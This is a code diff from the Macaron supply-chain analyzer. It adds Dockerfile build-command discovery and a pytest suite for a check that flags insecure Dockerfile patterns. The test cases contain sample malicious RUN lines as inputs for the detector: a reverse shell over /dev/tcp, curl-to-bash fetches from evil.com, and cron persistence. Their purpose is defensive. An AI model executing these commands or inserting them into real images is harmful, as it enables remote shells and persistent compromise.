analyzes GitHub Actions CI.""" @@ -18,6 +18,7 @@ from macaron.slsa_analyzer.build_tool.base_build_tool import BaseBuildTool, BuildToolCommand from macaron.slsa_analyzer.ci_service.base_ci_service import BaseCIService from macaron.slsa_analyzer.ci_service.github_actions.analyzer import ( + DockerNode, GitHubJobNode, GitHubWorkflowNode, GitHubWorkflowType, @@ -706,3 +707,50 @@ def get_third_party_configurations(self) -> list[str]: The list of third-party CI configuration files """ return self.third_party_configurations + + def get_docker_build_commands(self, callgraph: CallGraph, build_tool: BaseBuildTool) -> Iterable[BuildToolCommand]: + """Traverse the callgraph and find all Docker RUN commands that use build tools. + + Parameters + ---------- + callgraph: CallGraph + The callgraph reachable from the CI workflows. + build_tool: BaseBuildTool + The corresponding build tool for which shell commands need to be detected. + + Yields + ------ + BuildToolCommand + The object that contains the build command from Dockerfile RUN instructions. + """ + for node in callgraph.bfs(): + # Look for DockerNode instances + if isinstance(node, DockerNode) and hasattr(node, "dockerfile_path"): + dockerfile_path = node.dockerfile_path + + # Find the parent workflow for context + workflow_node = None + parent = node.caller + while parent: + if isinstance(parent, GitHubWorkflowNode): + workflow_node = parent + break + parent = parent.caller if hasattr(parent, "caller") else None + + # Check all BashNode children of this DockerNode + for child in node.callee: + if isinstance(child, BashNode): + # Check each command in the bash node + for cmd in child.parsed_bash_obj.get("commands", []): + if build_tool.is_build_command(cmd): + yield BuildToolCommand( + ci_path=dockerfile_path, + command=cmd, + step_node=child, + language=build_tool.language, + language_versions=None, + language_distributions=None, + language_url=None, + reachable_secrets=[], + events=get_ci_events(workflow_node) if workflow_node else [], + ) diff --git a/tests/slsa_analyzer/checks/test_insecure_patterns_dockerfile_check.py b/tests/slsa_analyzer/checks/test_insecure_patterns_dockerfile_check.py new file mode 100644 index 000000000..dffd3e8ba --- /dev/null +++ b/tests/slsa_analyzer/checks/test_insecure_patterns_dockerfile_check.py @@ -0,0 +1,524 @@ +# Copyright (c) 2022 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +"""Module to test the Dockerfile security check.""" + +from pathlib import Path +from unittest.mock import Mock, patch + +import pytest + +from macaron.database.table_definitions import Repository +from macaron.slsa_analyzer.checks.base_check import BaseCheck +from macaron.slsa_analyzer.checks.check_result import CheckResultType, Confidence +from macaron.slsa_analyzer.checks.insecure_patterns_dockerfile_check import ( + DockerfileSecurityAnalyzer, + DockerfileSecurityCheck, + DockerfileSecurityFacts, +) +from tests.conftest import MockAnalyzeContext + + +class TestDockerfileSecurityAnalyzer: + """Test cases for DockerfileSecurityAnalyzer.""" + + analyzer = DockerfileSecurityAnalyzer() + + def setup_method(self) -> None: + """Set up test fixtures.""" + + def test_analyze_empty_dockerfile(self) -> None: + """Test analyzing an empty Dockerfile.""" + issues, risk_score, base_image, version = self.analyzer.analyze_dockerfile_content("") + assert len(issues) == 0 + assert risk_score == 0 + assert base_image == "unknown" + assert version == "unknown" + + def test_analyze_invalid_dockerfile(self) -> None: + """Test analyzing an invalid Dockerfile.""" + invalid_content = "THIS IS NOT VALID DOCKERFILE CONTENT {{{invalid json" + _, _, base_image, version = self.analyzer.analyze_dockerfile_content(invalid_content) + # Should handle parse errors gracefully + assert base_image == "unknown" + assert version == "unknown" + + @pytest.mark.parametrize( + ("dockerfile_content", "expected_base_image", "expected_version", "min_risk_score"), + [ + pytest.param("FROM ubuntu:latest\nRUN apt-get update", "ubuntu", "latest", 15, id="test_from_latest_tag"), + pytest.param("FROM ubuntu\nRUN apt-get update", "ubuntu", "latest", 15, id="test_from_no_tag"), + pytest.param("FROM ubuntu:16.04\nRUN apt-get update", "ubuntu", "16.04", 25, id="test_from_old_image"), + pytest.param( + "FROM python:2.7-slim\nRUN pip install requests", + "python", + "2.7-slim", + 25, + id="test_from_deprecated_python", + ), + ], + ) + def test_from_instruction_analysis( + self, dockerfile_content: str, expected_base_image: str, expected_version: str, min_risk_score: int + ) -> None: + """Test FROM instruction analysis with various scenarios.""" + issues, risk_score, base_image, version = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + assert base_image == expected_base_image + assert version == expected_version + assert risk_score >= min_risk_score + assert any(issue["instruction"] == "FROM" for issue in issues) + + @pytest.mark.parametrize( + ("dockerfile_content", "expected_issue_count", "min_risk_score"), + [ + pytest.param("FROM ubuntu:20.04\nUSER root\nRUN apt-get update", 1, 30, id="test_user_root"), + pytest.param("FROM ubuntu:20.04\nUSER 0", 1, 30, id="test_user_numeric_root"), + pytest.param("FROM ubuntu:20.04\nUSER appuser", 0, 0, id="test_user_non_root"), + ], + ) + def test_user_instruction_analysis( + self, dockerfile_content: str, expected_issue_count: int, min_risk_score: int + ) -> None: + """Test USER instruction analysis.""" + issues, risk_score, _, _ = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + user_issues = [issue for issue in issues if issue["instruction"] == "USER"] + assert len(user_issues) == expected_issue_count + if expected_issue_count > 0: + assert risk_score >= min_risk_score + + @pytest.mark.parametrize( + ("expose_instruction", "expected_issues"), + [ + pytest.param("EXPOSE 22", ["22"], id="test_expose_ssh"), + pytest.param("EXPOSE 3306", ["3306"], id="test_expose_mysql"), + pytest.param("EXPOSE 22 23", ["22", "23"], id="test_expose_multiple_risky"), + pytest.param("EXPOSE 999", ["privileged port"], id="test_expose_privileged"), + pytest.param("EXPOSE 80 443", [], id="test_expose_safe_ports"), + pytest.param("EXPOSE 8080/tcp", [], id="test_expose_with_protocol"), + pytest.param("EXPOSE 100-200", ["privileged port"], id="test_expose_port_range"), + ], + ) + def test_expose_instruction_analysis(self, expose_instruction: str, expected_issues: list[str]) -> None: + """Test EXPOSE instruction analysis with various port configurations.""" + dockerfile_content = f"FROM ubuntu:20.04\n{expose_instruction}" + issues, _, _, _ = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + expose_issues = [issue for issue in issues if issue["instruction"] == "EXPOSE"] + + if expected_issues: + assert len(expose_issues) >= len(expected_issues) + for expected in expected_issues: + assert any(expected in issue["issue"] for issue in expose_issues) + else: + assert len(expose_issues) == 0 + + @pytest.mark.parametrize( + ("env_content", "expected_keywords"), + [ + pytest.param("ENV DATABASE_PASSWORD=secret123", ["pass"], id="test_env_password"), + pytest.param( + "ENV API_KEY=abcd1234\nENV SESSION_TOKEN=xyz789", + ["key", "session"], # Both should be lowercase since content_lower is used + id="test_env_multiple_sensitive", + ), + pytest.param("ENV MAINTAINER_EMAIL=admin@example.com", ["Email address"], id="test_env_email"), + pytest.param("ENV NODE_ENV=production", [], id="test_env_safe"), + ], + ) + def test_env_instruction_analysis(self, env_content: str, expected_keywords: list[str]) -> None: + """Test ENV instruction analysis for sensitive information.""" + dockerfile_content = f"FROM ubuntu:20.04\n{env_content}" + issues, _, _, _ = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + env_issues = [issue for issue in issues if issue["instruction"] == "ENV"] + + if expected_keywords: + assert len(env_issues) >= len(expected_keywords) + for keyword in expected_keywords: + assert any(keyword.lower() in issue["issue"].lower() for issue in env_issues) + else: + assert len(env_issues) == 0 + + @pytest.mark.parametrize( + ("volume_instruction", "expected_risk_score"), + [ + pytest.param("VOLUME /var/run/docker.sock", 40, id="test_volume_docker_socket"), + pytest.param('VOLUME ["/etc/docker", "/root/.ssh"]', 80, id="test_volume_multiple_unsafe"), + pytest.param("VOLUME /proc", 40, id="test_volume_proc"), + pytest.param("VOLUME /data", 0, id="test_volume_safe"), + ], + ) + def test_volume_instruction_analysis(self, volume_instruction: str, expected_risk_score: int) -> None: + """Test VOLUME instruction analysis for unsafe mounts.""" + dockerfile_content = f"FROM ubuntu:20.04\n{volume_instruction}" + _, risk_score, _, _ = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + assert risk_score >= expected_risk_score + + @pytest.mark.parametrize( + ("copy_instruction", "expected_issue_type"), + [ + pytest.param("COPY . /app", "entire build context", id="test_copy_all"), + pytest.param("COPY .git /app/.git", "sensitive file", id="test_copy_git"), + pytest.param("COPY id_rsa /root/.ssh/", "Security-critical file", id="test_copy_ssh_key"), + pytest.param("COPY app.py /app/", None, id="test_copy_safe"), + ], + ) + def test_copy_instruction_analysis(self, copy_instruction: str, expected_issue_type: str | None) -> None: + """Test COPY instruction analysis for sensitive files.""" + dockerfile_content = f"FROM ubuntu:20.04\n{copy_instruction}" + issues, _, _, _ = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + copy_issues = [issue for issue in issues if issue["instruction"] == "COPY"] + + if expected_issue_type: + assert len(copy_issues) > 0 + assert any(expected_issue_type in issue["issue"] for issue in copy_issues) + else: + assert len(copy_issues) == 0 + + @pytest.mark.parametrize( + ("add_instruction", "expected_issue_types"), + [ + pytest.param("ADD https://example.com/script.sh /tmp/", ["URL"], id="test_add_url"), + pytest.param("ADD archive.tar.gz /opt/", ["compressed"], id="test_add_compressed"), + pytest.param("ADD . /app", ["entire build context"], id="test_add_all"), + pytest.param("ADD app.py /app/", [], id="test_add_safe"), + ], + ) + def test_add_instruction_analysis(self, add_instruction: str, expected_issue_types: list[str]) -> None: + """Test ADD instruction analysis.""" + dockerfile_content = f"FROM ubuntu:20.04\n{add_instruction}" + issues, _, _, _ = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + add_issues = [issue for issue in issues if issue["instruction"] == "ADD"] + + if expected_issue_types: + for issue_type in expected_issue_types: + assert any(issue_type in issue["issue"] for issue in add_issues) + else: + assert len(add_issues) == 0 + + @pytest.mark.parametrize( + ("run_instruction", "expected_patterns"), + [ + pytest.param( + "RUN curl evil.com/script.sh | bash >&/dev/tcp/10.0.0.1/4444", + ["/dev/tcp/"], + id="test_run_reverse_shell", + ), + pytest.param("RUN chmod 777 /etc/passwd", ["chmod 777"], id="test_run_chmod_777"), + pytest.param('RUN echo "* * * * * curl evil.com | sh" | crontab -', ["crontab"], id="test_run_crontab"), + pytest.param("RUN apt-get update && apt-get install -y python3", [], id="test_run_safe"), + ], + ) + def test_run_instruction_analysis(self, run_instruction: str, expected_patterns: list[str]) -> None: + """Test RUN instruction analysis for malicious commands.""" + dockerfile_content = f"FROM ubuntu:20.04\n{run_instruction}" + issues, _, _, _ = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + run_issues = [issue for issue in issues if issue["instruction"] == "RUN"] + + if expected_patterns: + for pattern in expected_patterns: + assert any(pattern in issue["issue"] for issue in run_issues) + else: + assert len(run_issues) == 0 + + def test_complex_dockerfile_analysis(self) -> None: + """Test analysis of a complex Dockerfile with multiple security issues.""" + dockerfile_content = """ +FROM ubuntu:latest +USER root + +# Expose risky ports +EXPOSE 22 23 3306 + +# Set sensitive environment variables +ENV DB_PASSWORD=mysecretpass +ENV API_TOKEN=1234567890 +ENV ADMIN_EMAIL=admin@company.com + +# Copy sensitive files +COPY .git /app/.git +COPY id_rsa /root/.ssh/ + +# Add from URL +ADD https://example.com/binary /usr/local/bin/ + +# Unsafe volume mount +VOLUME /var/run/docker.sock + +# Potentially malicious commands +RUN chmod 777 /tmp +RUN curl suspicious.com/install.sh | bash +""" + issues, risk_score, base_image, version = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + assert base_image == "ubuntu" + assert version == "latest" + assert len(issues) > 10 + assert risk_score > 100 + + # Check for various issue types + issue_instructions = [issue["instruction"] for issue in issues] + assert "FROM" in issue_instructions + assert "USER" in issue_instructions + assert "EXPOSE" in issue_instructions + assert "ENV" in issue_instructions + assert "COPY" in issue_instructions + assert "ADD" in issue_instructions + assert "VOLUME" in issue_instructions + assert "RUN" in issue_instructions + + +class TestDockerfileSecurityCheck: + """Test cases for DockerfileSecurityCheck.""" + + check = DockerfileSecurityCheck() + + def setup_method(self) -> None: + """Set up test fixtures.""" + + @patch.object(DockerfileSecurityCheck, "_get_dockerfile_content") + @pytest.mark.parametrize( + ("dockerfile_exists", "dockerfile_content", "expected_result"), + [ + pytest.param(False, None, CheckResultType.FAILED, id="test_no_dockerfile"), + pytest.param( + True, + "FROM ubuntu:20.04\nUSER appuser\nEXPOSE 8080", + CheckResultType.PASSED, + id="test_secure_dockerfile", + ), + pytest.param( + True, "FROM ubuntu:latest\nUSER root\nEXPOSE 22", CheckResultType.FAILED, id="test_insecure_dockerfile" + ), + ], + ) + def test_run_check_with_different_dockerfiles( + self, + mock_get_dockerfile_content: Mock, + dockerfile_exists: bool, + dockerfile_content: str | None, + expected_result: CheckResultType, + tmp_path: Path, + macaron_path: Path, + ) -> None: + """Test run_check with different Dockerfile scenarios.""" + # Create mock context + ctx = MockAnalyzeContext(macaron_path=macaron_path, output_dir=str(tmp_path)) + + # Create a mock repository with fs_path + mock_repo = Mock(spec=Repository) + mock_repo.fs_path = str(tmp_path) + + # Create a mock component with the repository + mock_component = Mock() + mock_component.repository = mock_repo + + if dockerfile_exists: + mock_get_dockerfile_content.return_value = dockerfile_content + else: + mock_get_dockerfile_content.return_value = None + + # Run the check + result = self.check.run_check(ctx) + + assert result.result_type == expected_result + + def test_run_check_no_component(self, tmp_path: Path, macaron_path: Path) -> None: + """Test run_check when component is None.""" + ctx = MockAnalyzeContext(macaron_path=macaron_path, output_dir=str(tmp_path)) + + result = self.check.run_check(ctx) + + assert result.result_type == CheckResultType.FAILED + assert len(result.result_tables) == 0 + + @patch.object(DockerfileSecurityCheck, "_get_dockerfile_content") + def test_run_check_with_subdirectory_dockerfile( + self, mock_get_dockerfile_content: Mock, tmp_path: Path, macaron_path: Path + ) -> None: + """Test finding Dockerfile in subdirectory.""" + ctx = MockAnalyzeContext(macaron_path=macaron_path, output_dir=str(tmp_path)) + + # Create mock repository + mock_repo = Mock(spec=Repository) + mock_repo.fs_path = str(tmp_path) + + mock_component = Mock() + mock_component.repository = mock_repo + + # Mock the Dockerfile content + mock_get_dockerfile_content.return_value = "FROM node:16\nUSER node" + + result = self.check.run_check(ctx) + + assert result.result_type == CheckResultType.PASSED + assert len(result.result_tables) == 1 + + facts = result.result_tables[0] + assert isinstance(facts, DockerfileSecurityFacts) + assert facts.base_image_name == "node" + assert facts.base_image_version == "16" + + @patch.object(DockerfileSecurityCheck, "_get_dockerfile_content") + @pytest.mark.parametrize( + ("risk_score", "expected_result_type", "expected_confidence"), + [ + pytest.param(0, CheckResultType.PASSED, Confidence.HIGH, id="test_no_risk"), + pytest.param(30, CheckResultType.PASSED, Confidence.MEDIUM, id="test_low_risk"), + pytest.param(60, CheckResultType.FAILED, Confidence.MEDIUM, id="test_medium_risk"), + pytest.param(120, CheckResultType.FAILED, Confidence.HIGH, id="test_high_risk"), + ], + ) + def test_risk_score_to_result_mapping( + self, + mock_get_dockerfile_content: Mock, + risk_score: int, + expected_result_type: CheckResultType, + expected_confidence: Confidence, + tmp_path: Path, + macaron_path: Path, + ) -> None: + """Test that risk scores map to correct result types and confidence levels.""" + ctx = MockAnalyzeContext(macaron_path=macaron_path, output_dir=str(tmp_path)) + + mock_repo = Mock(spec=Repository) + mock_repo.fs_path = str(tmp_path) + mock_component = Mock() + mock_component.repository = mock_repo + + # Create a Dockerfile that will produce the desired risk score + if risk_score == 0: + dockerfile_content = "FROM ubuntu:20.04\nUSER appuser" + elif risk_score == 30: + dockerfile_content = "FROM ubuntu:latest\nUSER root" + elif risk_score == 60: + dockerfile_content = "FROM ubuntu:latest\nUSER root\nEXPOSE 22" + else: # risk_score >= 100 + dockerfile_content = """ +FROM ubuntu:latest +USER root +EXPOSE 22 +ENV PASSWORD=secret +VOLUME /var/run/docker.sock +RUN chmod 777 /etc +""" + + # Mock the return value + mock_get_dockerfile_content.return_value = dockerfile_content + + result = self.check.run_check(ctx) + + assert result.result_type == expected_result_type + if result.result_tables: + facts = result.result_tables[0] + assert facts.confidence == expected_confidence + + def test_run_check_os_error_handling(self, tmp_path: Path, macaron_path: Path) -> None: + """Test error handling when OS error occurs.""" + ctx = MockAnalyzeContext(macaron_path=macaron_path, output_dir=str(tmp_path)) + + mock_repo = Mock(spec=Repository) + mock_repo.fs_path = str(tmp_path) + + # Create a Dockerfile but make it unreadable + dockerfile_path = tmp_path / "Dockerfile" + dockerfile_path.write_text("FROM ubuntu:20.04") + + # Mock open to raise OSError + with patch("builtins.open", side_effect=OSError("Permission denied")): + result = self.check.run_check(ctx) + + assert result.result_type == CheckResultType.FAILED + + def test_check_metadata(self) -> None: + """Test check metadata and configuration.""" + # Use the public interface method to get check_id + + # The check_id is accessible via get_check_id method or similar + # For now, we'll just verify the check was properly initialized + assert isinstance(self.check, BaseCheck) + assert hasattr(self.check, "result_on_skip") + assert self.check.result_on_skip == CheckResultType.FAILED + + @patch.object(DockerfileSecurityCheck, "_get_dockerfile_content") + def test_security_issues_grouping( + self, mock_get_dockerfile_content: Mock, tmp_path: Path, macaron_path: Path + ) -> None: + """Test that security issues are properly grouped by severity and instruction.""" + ctx = MockAnalyzeContext(macaron_path=macaron_path, output_dir=str(tmp_path)) + + mock_repo = Mock(spec=Repository) + mock_repo.fs_path = str(tmp_path) + mock_component = Mock() + mock_component.repository = mock_repo + + # Mock Dockerfile with multiple issues + dockerfile_content = """ +FROM ubuntu:latest +USER root +EXPOSE 22 3306 +ENV PASSWORD=secret +ENV TOKEN=abcd1234 +""" + mock_get_dockerfile_content.return_value = dockerfile_content + + result = self.check.run_check(ctx) + assert len(result.result_tables) > 0 + facts = result.result_tables[0] + assert isinstance(facts, DockerfileSecurityFacts) + + security_issues = facts.security_issues + assert "total_issues" in security_issues + total_issues = security_issues.get("total_issues") + assert isinstance(total_issues, int) + assert total_issues > 0 + + assert "issues_by_severity" in security_issues + assert isinstance(security_issues["issues_by_severity"], dict) + assert len(security_issues["issues_by_severity"]) > 0 + + assert "issues_by_instruction" in security_issues + assert isinstance(security_issues["issues_by_instruction"], dict) + assert "FROM" in security_issues["issues_by_instruction"] + assert "USER" in security_issues["issues_by_instruction"] + assert "EXPOSE" in security_issues["issues_by_instruction"] + assert "ENV" in security_issues["issues_by_instruction"] + + +class TestDockerfileSecurityFacts: + """Test cases for DockerfileSecurityFacts ORM model.""" + + def test_facts_creation(self) -> None: + """Test creating DockerfileSecurityFacts instance.""" + security_issues = { + "total_issues": 3, + "risk_score": 45, + "issues_by_severity": {"HIGH": 1, "MEDIUM": 2}, + "issues_by_instruction": {"FROM": 1, "USER": 1, "EXPOSE": 1}, + "detailed_issues": [ + {"severity": "HIGH", "instruction": "USER", "issue": "Running as root", "risk_points": "30"} + ], + } + + facts = DockerfileSecurityFacts( + base_image_name="ubuntu", + base_image_version="20.04", + security_issues=security_issues, + risk_score=45, + issues_count=3, + confidence=0.8, + ) + + assert facts.base_image_name == "ubuntu" + assert facts.base_image_version == "20.04" + assert facts.risk_score == 45 + assert facts.issues_count == 3 + assert facts.confidence == 0.8 + assert facts.security_issues["total_issues"] == 3 + assert facts.security_issues["risk_score"] == 45